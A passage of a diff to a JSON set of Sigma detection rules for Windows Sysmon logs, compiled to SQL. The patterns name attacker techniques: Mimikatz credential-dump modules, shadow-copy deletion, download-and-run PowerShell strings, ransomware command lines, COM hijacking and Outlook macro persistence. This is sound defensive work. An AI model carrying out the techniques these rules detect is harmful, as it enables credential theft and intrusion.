'%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "title": "Potential Persistence Via COM Hijacking 
From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine 
LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE 
'%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.002" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": 
"Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "status": "experimental", - "description": 
"Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": 
"e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). 
Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 
vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", - "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based 
